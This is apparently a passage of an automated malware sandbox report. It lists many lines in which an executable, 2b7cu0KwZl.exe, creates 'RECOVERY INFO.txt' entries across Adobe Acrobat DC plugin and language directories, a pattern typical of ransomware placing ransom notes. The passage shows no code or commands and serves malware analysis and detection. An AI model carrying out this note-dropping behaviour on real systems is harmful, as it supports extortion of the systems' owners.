Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
